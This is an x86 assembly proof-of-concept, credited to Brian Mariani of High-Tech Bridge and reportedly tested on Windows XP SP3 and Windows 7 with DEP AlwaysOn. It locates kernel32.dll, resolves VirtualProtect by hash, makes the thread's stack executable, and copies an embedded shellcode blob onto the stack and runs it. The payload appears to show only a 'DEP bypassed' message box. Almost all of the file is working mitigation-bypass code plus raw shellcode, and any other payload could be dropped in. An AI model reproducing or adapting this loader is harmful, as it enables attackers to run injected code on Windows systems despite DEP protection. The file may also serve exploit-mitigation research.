;Brian Mariani High-Tech Bridge ;Finding Kernel32.dll base address ;Index to VirtualProtect ;Disabling NonExecute attributes ;in actual thread memory stack ;Injecting the payload in the ;stack and execute it ;Tested in Windows XP SP3 DEP ;AlwaysOn & Windows 7 Enterprise DEP AlwaysON ;Thanks to http://opc0de.tuxfamily.org/?p=430 ;for Kernel generic search section .text global _WinMain@16 _WinMain@16: jmp ep_ whereis_kernel32: xor ecx, ecx mov esi, [fs:ecx + 30h] mov esi, [esi + 0ch] mov esi, [esi + 1ch] search_another_module: mov eax, [esi + 08h] mov edi, [esi + 20h] mov esi, [esi] cmp [edi + 12 * 2], cl jne search_another_module ret function_address: pushad mov ebp, [esp + 024h] mov eax, [ebp + 03ch] mov edx, [ebp + eax + 078h] add edx, ebp mov ecx, [edx + 018h] mov ebx, [edx + 020h] add ebx, ebp find_func_address_loop: jecxz find_address_done dec ecx mov esi, [ebx + ecx * 4] add esi, ebp Api_hash: xor edi, edi xor eax, eax cld hashing: lodsb test al, al jz hash_done ror edi, 0dh add edi, eax jmp hashing hash_done: is_it_right_hash: cmp edi, [esp + 028h] jnz find_func_address_loop mov ebx, [edx + 024h] add ebx, ebp mov cx, [ebx + 2 * ecx] mov ebx, [edx + 01ch] add ebx, ebp mov eax, [ebx + 4 * ecx] add eax, ebp mov [esp + 01ch], eax find_address_done: popad ret ep_: mov eax,[FS:0x20] ;Get Process ID xor eax,eax sub esp, 12 mov ebp, esp call whereis_kernel32 mov edx, eax push 07946c61bh ;VirtualProtectHash push edx call function_address mov [ebp+4], eax mov esi,[fs:0x08] ;Put in esi the bottom stack address of current thread push 0x20 ;Push old memory attributes lea edi,[esp] push edi push 0x40 ;Push new memory attributes mov ebx, [fs:0x08] ;Calculate actual thread stack size mov edi, [fs:0x04] sub edi,ebx push edi ;Push memory size push esi ;bottom stack address call eax ;VirtualProtect xor ecx,ecx ; Set counter to zero xor eax,eax ; Set to zero mov ecx,0x118 ; Shellcode size mov eax,shellcode ; Eax point to start of shellcode .inject_shellcode_in_stack: cmp ecx,0x0 ; Is the shellcode injected in the stack? je .execute ; If Yes execute it push dword [eax+ecx] ; Push next dword sub ecx,4 ; Decrement counter jmp .inject_shellcode_in_stack ; Loop until ecx = 0 .execute: ;int 3 call esp ;Execute the payload from stack [section .data] shellcode db 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xd9,0xeb,0x9b,0xd9,0x74,0x24,0xf4,0x31,0xd2,0xb2,0x77,0x31,0xc9,0x64,0x8b,0x71,0x30,0x8b,0x76,0x0c,0x8b,0x76,0x1c,0x8b,0x46,0x08,0x8b,0x7e,0x20,0x8b,0x36,0x38,0x4f,0x18,0x75,0xf3,0x59,0x01,0xd1,0xff,0xe1,0x60,0x8b,0x6c,0x24,0x24,0x8b,0x45,0x3c,0x8b,0x54,0x28,0x78,0x01,0xea,0x8b,0x4a,0x18,0x8b,0x5a,0x20,0x01,0xeb,0xe3,0x34,0x49,0x8b,0x34,0x8b,0x01,0xee,0x31,0xff,0x31,0xc0,0xfc,0xac,0x84,0xc0,0x74,0x07,0xc1,0xcf,0x0d,0x01,0xc7,0xeb,0xf4,0x3b,0x7c,0x24,0x28,0x75,0xe1,0x8b,0x5a,0x24,0x01,0xeb,0x66,0x8b,0x0c,0x4b,0x8b,0x5a,0x1c,0x01,0xeb,0x8b,0x04,0x8b,0x01,0xe8,0x89,0x44,0x24,0x1c,0x61,0xc3,0xb2,0x08,0x29,0xd4,0x89,0xe5,0x89,0xc2,0x68,0x8e,0x4e,0x0e,0xec,0x52,0xe8,0x9f,0xff,0xff,0xff,0x89,0x45,0x04,0xbb,0x7e,0xd8,0xe2,0x73,0x87,0x1c,0x24,0x52,0xe8,0x8e,0xff,0xff,0xff,0x89,0x45,0x08,0x68,0x6c,0x6c,0x20,0x41,0x68,0x33,0x32,0x2e,0x64,0x68,0x75,0x73,0x65,0x72,0x88,0x5c,0x24,0x0a,0x89,0xe6,0x56,0xff,0x55,0x04,0x89,0xc2,0x50,0xbb,0xa8,0xa2,0x4d,0xbc,0x87,0x1c,0x24,0x52,0xe8,0x61,0xff,0xff,0xff,0x68,0x6f,0x78,0x58,0x20,0x68,0x61,0x67,0x65,0x42,0x68,0x4d,0x65,0x73,0x73,0x31,0xdb,0x88,0x5c,0x24,0x0a,0x89,0xe3,0x68,0x58,0x20,0x20,0x20,0x68,0x21,0x20,0x3a,0x5d,0x68,0x73,0x73,0x65,0x64,0x68,0x62,0x79,0x70,0x61,0x68,0x44,0x45,0x50,0x20,0x31,0xc9,0x88,0x4c,0x24,0x10,0x89,0xe1,0x31,0xd2,0x52,0x53,0x51,0x52,0xff,0xd0,0x31,0xc0,0x50,0xff,0x55,0x08